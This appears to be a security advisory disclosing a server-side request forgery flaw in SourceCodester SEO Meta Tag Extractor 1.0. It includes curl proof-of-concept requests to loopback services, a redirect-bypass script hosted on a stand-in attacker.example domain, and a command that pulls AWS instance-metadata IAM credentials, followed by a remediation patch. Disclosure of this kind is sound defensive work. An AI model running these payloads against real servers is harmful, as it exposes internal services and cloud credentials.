# SourceCodester SEO Meta Tag Extractor 1.0 - Server-Side Request Forgery via URL Parameter ## Vulnerability Information | Field | Detail | |-------------|----------------------------------------------| | **Product** | SEO Meta Tag Extractor | | **Vendor** | SourceCodester (Author: rems / remyandrade) | | **Version** | 1.0 | | **Type** | Server-Side Request Forgery (CWE-918) | | **Author** | Kevin Chiang | | **Date** | 2026-05-11 | | **CVSS** | 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) | --- ## Affected Component - **Entry Endpoint**: `index.php` (POST handler) - **Vulnerable Function**: `fetchMetaTags($url)` - **Sink #1**: `get_headers($url, 1)` at `index.php:8` - **Sink #2**: `file_get_contents($url)` at `index.php:13` - **Parameter**: `url` (application/x-www-form-urlencoded, POST) --- ## Description A server-side request forgery vulnerability was found in SourceCodester SEO Meta Tag Extractor 1.0. It affects the function `fetchMetaTags()` of the file `index.php`. The application accepts a user-supplied URL via the `url` POST parameter and passes it directly to `get_headers()` and `file_get_contents()` without any restriction against private, loopback, or link-local IP ranges. The only validation performed is `FILTER_VALIDATE_URL`, which checks syntactic URL validity but does not block internal addresses. In addition, `file_get_contents()` follows HTTP redirects by default, allowing an attacker-controlled external URL to redirect the server-side fetch to an internal endpoint, bypassing any naive hostname/IP blacklist that may be added later. The root cause is the absence of network-layer validation on the attacker-controlled URL: ```php // index.php (line 3-13) function fetchMetaTags($url) { if (!filter_var($url, FILTER_VALIDATE_URL)) { return ['error' => 'Invalid URL format']; } $headers = get_headers($url, 1); // SINK #1 if (strpos($headers[0], '200') === false) { return ['error' => 'URL not reachable']; } $html = @file_get_contents($url); // SINK #2 ... } ``` The parsed HTML content is then echoed back to the attacker via the result page (title, meta description, OG tags, links), enabling a fully read-capable SSRF. --- ## Steps to Reproduce ### Environment - OS: Ubuntu 22.04 LTS - Web Server: PHP 8.1.2 built-in development server - PHP: 8.1.2 - Test URL: `http://192.168.2.132:8080/` ### Steps 1. Deploy SEO Meta Tag Extractor 1.0 on a host that runs an internal service bound to its loopback interface (e.g., Python HTTP server, admin panel, Redis, or the cloud metadata service at `169.254.169.254`). 2. Start the vulnerable application: ```bash cd seo-meta-tag-extractor/ php -S 0.0.0.0:8080 ``` 3. From an external host, verify the internal service is NOT directly reachable: ```bash curl http://192.168.2.132:9999/ # → connection refused ``` 4. Submit the SSRF payload to the vulnerable application: ```bash curl -X POST 'http://192.168.2.132:8080/' \ --data-urlencode 'url=http://127.0.0.1:9999/' ``` 5. Observe that the HTTP response body contains content fetched from `127.0.0.1:9999` (title, meta tags, etc.) - the server made the request on behalf of the attacker. --- ## Proof of Concept ### Simulated Internal Service On the victim host, run a service bound to loopback only: ```bash mkdir -p /tmp/internal && cd /tmp/internal cat > index.html <<'EOF' <!DOCTYPE html> <html><head> <title>INTERNAL SECRET PAGE</title> <meta name="description" content="Bound to 127.0.0.1 only."> <meta name="keywords" content="admin,DB-password=hunter2,internal"> </head><body><h1>SSRF success</h1></body></html> EOF # --bind 127.0.0.1 → reachable from PHP only, NOT from external network python3 -m http.server 9999 --bind 127.0.0.1 ``` ### Vulnerable HTTP Request ```http POST /index.php HTTP/1.1 Host: 192.168.2.132:8080 Content-Type: application/x-www-form-urlencoded url=http%3A%2F%2F127.0.0.1%3A9999%2F ``` ### cURL PoC ```bash # 1. Confirm internal service is not externally accessible curl --max-time 3 http://192.168.2.132:9999/ # → curl: (7) Failed to connect ... # 2. Trigger SSRF via the vulnerable application curl -X POST 'http://192.168.2.132:8080/' \ --data-urlencode 'url=http://127.0.0.1:9999/' \ | grep -i 'INTERNAL SECRET' # → <span class="meta-value">INTERNAL SECRET PAGE</span> ``` ### Expected Result The HTTP response from the vulnerable application contains the title `INTERNAL SECRET PAGE` and other metadata fetched from the loopback-only service, proving that the server-side request was successfully made on behalf of an unauthenticated remote attacker. ### Redirect Bypass PoC (defeats naive IP blacklists) Host a 302 redirector under attacker control: ```php <?php // redir.php on attacker.example header("Location: http://127.0.0.1:9999/"); exit; ``` Then submit the public URL: ```bash curl -X POST 'http://192.168.2.132:8080/' \ --data-urlencode 'url=http://attacker.example/redir.php' ``` `file_get_contents()` follows the 302 and still fetches the internal resource, even if the input URL passes any blacklist check. ### Cloud Metadata Attack (deployment-dependent) When deployed on AWS EC2 without IMDSv2 enforced: ```bash curl -X POST 'http://<target>/index.php' \ --data-urlencode 'url=http://169.254.169.254/latest/meta-data/iam/security-credentials/' ``` → The application's response leaks the IAM role name, which can be chained with a second request to retrieve temporary credentials. --- ## Code Flow ``` [Remote Attacker] │ │ POST /index.php (url=http://127.0.0.1:9999/) ↓ fetchMetaTags($url) index.php:3 │ │ filter_var($url, FILTER_VALIDATE_URL) │ └─ syntactic check only; private IPs PASS │ ↓ get_headers($url, 1) index.php:8 【SINK #1】 │ PHP issues HTTP request to 127.0.0.1:9999 │ ↓ file_get_contents($url) index.php:13 【SINK #2】 │ PHP fetches response body │ (follows HTTP 3xx redirects by default) │ ↓ DOMDocument::loadHTML($html) index.php:18-19 │ Parses internal-only content │ ↓ Echo extracted meta tags back to attacker index.php:117-217 │ title, description, OG/Twitter cards, canonical, h1, etc. ↓ Internal data exposed to unauthenticated remote attacker ``` --- ## Impact An unauthenticated remote attacker can: - Probe internal/private network services not reachable from the public Internet (loopback, RFC 1918, link-local). - Read responses from internal HTTP-speaking services through the echoed meta-tag output (full read-capable SSRF). - Enumerate open ports on the host and adjacent network by comparing the `URL not reachable` vs successful response branches. - On cloud deployments without IMDSv2 enforcement, retrieve cloud instance metadata (e.g., AWS IMDS at `169.254.169.254`) including temporary IAM credentials, escalating to cloud account compromise. - Bypass IP-based access control on internal admin panels that trust `127.0.0.1` or the host's primary interface. - Defeat naive URL blacklists by using attacker-controlled HTTP redirects to internal addresses. --- ## Remediation The recommended fix combines four controls in `fetchMetaTags()`: 1. **Scheme allowlist**: accept only `http` and `https` (the existing regex on `index.php:64` also allows `ftp` / `ftps`). 2. **Hostname resolution + IP allowlist**: resolve the hostname with `gethostbynamel()` and reject any address inside private, loopback, link-local, or multicast ranges (RFC 1918, `127.0.0.0/8`, `169.254.0.0/16`, `::1`, `fc00::/7`, etc.). 3. **Disable HTTP redirect following**: use a custom stream context with `'follow_location' => 0`, and re-validate the redirect target against the same allowlist for each hop. 4. **Set request timeout and max content length** to limit abuse for port scanning and denial-of-service. Example patch sketch: ```php function isPublicUrl($url) { $parts = parse_url($url); if (!$parts || !in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'])) { return false; } $ips = gethostbynamel($parts['host'] ?? ''); if (!$ips) return false; foreach ($ips as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) { return false; } } return true; } ``` --- ## Vendor Notification | Date | Action | |------------|----------------------------- | | 2026-05-11 | Vendor notified via SourceCodester contact form | --- ## References - Vendor homepage: https://www.sourcecodester.com/ - Project page: https://www.sourcecodester.com/php/18271/seo-meta-tag-extractor-using-php-and-javascript-source-code.html - Author page: https://www.sourcecodester.com/users/remyandrade - Related CWE: CWE-918 (Server-Side Request Forgery) - Related CWE: CWE-441 (Unintended Proxy or Intermediary - 'Confused Deputy')